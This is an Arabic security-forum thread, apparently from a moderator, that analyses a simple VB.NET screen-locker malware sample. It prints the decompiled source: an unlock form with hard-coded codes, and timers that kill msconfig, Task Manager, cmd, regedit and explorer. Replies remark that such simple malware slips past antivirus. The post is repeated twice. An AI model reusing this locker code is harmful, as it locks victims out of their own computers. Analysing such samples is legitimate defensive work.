MagicianMiDo32
مراقب قسم الحماية ، خبراء زيزووم
طـــاقم الإدارة
★★ نجم المنتدى ★★
فريق فحص زيزووم للحماية
نجم الشهر
عضوية موثوقة ✔️
كبار الشخصيات
- إنضم
- 29 أبريل 2012
- المشاركات
- 9,235
- مستوى التفاعل
- 27,170
- النقاط
- 6,750
- الإقامة
- Egypt
- الموقع الالكتروني
- web.facebook.com
غير متصل
من فضلك قم بتحديث الصفحة لمشاهدة المحتوى المخفي
واضح جدا
لو كان التكست بوكس 1 =4991
وتكست بوكس 2 =3150
والتكست بوكس 3 = 7369
أقفل الفورم
ملحوظة me.close أعتبره عن نفسي من غباء اللغة
مجرد رأي
Private Sub Button1_Click(ByVal sender As Object, ByVal e As EventArgs)
If (((Me.
Interaction.MsgBox("Ok", MsgBoxStyle.ApplicationModal, "Clé")
Me.Close
Else
Interaction.MsgBox("Erreur!", MsgBoxStyle.ApplicationModal, "Clé")
End If
End Sub
الزر الثاني يفتح هذة الصفحة
[hide]
[hide]
[hide]
Private Sub Button2_Click(ByVal sender As Object, ByVal e As EventArgs)
Process.Start("
End Sub
[/hide][/hide]
قتل عملية msconfig
[hide]
Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs)
Try
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "msconfig") Then
process.Kill
ElseIf (process.ProcessName = "msconfig") Then
process.Kill
End If
Next
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
Dim exception As Exception = exception1
ProjectData.ClearProjectError
End Try
End Sub
[/hide]
قتل التاسك مانيجر
[hide]
Private Sub Timer2_Tick(ByVal sender As Object, ByVal e As EventArgs)
Try
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "Taskmgr") Then
process.Kill
ElseIf (process.ProcessName = "taskmgr") Then
process.Kill
End If
Next
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
Dim exception As Exception = exception1
ProjectData.ClearProjectError
End Try
End Sub
[/hide]
قتل شاشة الدوس
[hide]
Private Sub Timer3_Tick(ByVal sender As Object, ByVal e As EventArgs)
Try
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "cmd") Then
process.Kill
ElseIf (process.ProcessName = "cmd") Then
process.Kill
End If
Next
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
Dim exception As Exception = exception1
ProjectData.ClearProjectError
End Try
End Sub
[/hide]
قتل محرر الريجستري
[hide]
Private Sub Timer4_Tick(ByVal sender As Object, ByVal e As EventArgs)
Try
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "regedit") Then
process.Kill
ElseIf (process.ProcessName = "regedit") Then
process.Kill
End If
Next
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
Dim exception As Exception = exception1
ProjectData.ClearProjectError
End Try
End Sub
[/hide]
قتل الإكسبلورر
[hide]
Private Sub Timer5_Tick(ByVal sender As Object, ByVal e As EventArgs)
Try
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "explorer") Then
process.Kill
ElseIf (process.ProcessName = "explorer") Then
process.Kill
End If
Next
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
Dim exception As Exception = exception1
ProjectData.ClearProjectError
End Try
End Sub
[/hide]
العمل في وسط الشاشة
Me.StartPosition = FormStartPosition.CenterScreen
بس كدا
ياراجل عملت الي أحسن منه واتكسفت أطرحه في المنتدى
يقوم دا يوقع الكاسبر
يانهار أي فون
سبحان الله العبد لله بلاك 007 يقعد يشفر لحد ماعينة تطلع وفي الآخر الكاسبر يقفش ملفه
وشوية سورسات مالي بناخدهم فاعدادي يوقعو الكاسبح
ياوهووووي
بس أنا لاحظت أن برامج الحماية بتكون ضعيفة ضد الـSimple Malwares
لو كان التكست بوكس 1 =4991
وتكست بوكس 2 =3150
والتكست بوكس 3 = 7369
أقفل الفورم
ملحوظة me.close أعتبره عن نفسي من غباء اللغة
مجرد رأي
Private Sub Button1_Click(ByVal sender As Object, ByVal e As EventArgs)
If (((Me.
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
.
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
= "4991") And (Me.
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
.
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
= "3150")) And (Me.
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
.
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
= "7369")) ThenInteraction.MsgBox("Ok", MsgBoxStyle.ApplicationModal, "Clé")
Me.Close
Else
Interaction.MsgBox("Erreur!", MsgBoxStyle.ApplicationModal, "Clé")
End If
End Sub
الزر الثاني يفتح هذة الصفحة
[hide]
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
[/hide][hide]
[hide]
Private Sub Button2_Click(ByVal sender As Object, ByVal e As EventArgs)
Process.Start("
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
")End Sub
[/hide][/hide]
قتل عملية msconfig
[hide]
Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs)
Try
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "msconfig") Then
process.Kill
ElseIf (process.ProcessName = "msconfig") Then
process.Kill
End If
Next
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
Dim exception As Exception = exception1
ProjectData.ClearProjectError
End Try
End Sub
[/hide]
قتل التاسك مانيجر
[hide]
Private Sub Timer2_Tick(ByVal sender As Object, ByVal e As EventArgs)
Try
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "Taskmgr") Then
process.Kill
ElseIf (process.ProcessName = "taskmgr") Then
process.Kill
End If
Next
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
Dim exception As Exception = exception1
ProjectData.ClearProjectError
End Try
End Sub
[/hide]
قتل شاشة الدوس
[hide]
Private Sub Timer3_Tick(ByVal sender As Object, ByVal e As EventArgs)
Try
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "cmd") Then
process.Kill
ElseIf (process.ProcessName = "cmd") Then
process.Kill
End If
Next
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
Dim exception As Exception = exception1
ProjectData.ClearProjectError
End Try
End Sub
[/hide]
قتل محرر الريجستري
[hide]
Private Sub Timer4_Tick(ByVal sender As Object, ByVal e As EventArgs)
Try
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "regedit") Then
process.Kill
ElseIf (process.ProcessName = "regedit") Then
process.Kill
End If
Next
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
Dim exception As Exception = exception1
ProjectData.ClearProjectError
End Try
End Sub
[/hide]
قتل الإكسبلورر
[hide]
Private Sub Timer5_Tick(ByVal sender As Object, ByVal e As EventArgs)
Try
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "explorer") Then
process.Kill
ElseIf (process.ProcessName = "explorer") Then
process.Kill
End If
Next
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
Dim exception As Exception = exception1
ProjectData.ClearProjectError
End Try
End Sub
[/hide]
العمل في وسط الشاشة
Me.StartPosition = FormStartPosition.CenterScreen
بس كدا
ياراجل عملت الي أحسن منه واتكسفت أطرحه في المنتدى
يقوم دا يوقع الكاسبر
يانهار أي فون
سبحان الله العبد لله بلاك 007 يقعد يشفر لحد ماعينة تطلع وفي الآخر الكاسبر يقفش ملفه
وشوية سورسات مالي بناخدهم فاعدادي يوقعو الكاسبح
ياوهووووي
بس أنا لاحظت أن برامج الحماية بتكون ضعيفة ضد الـSimple Malwares

التعديل الأخير: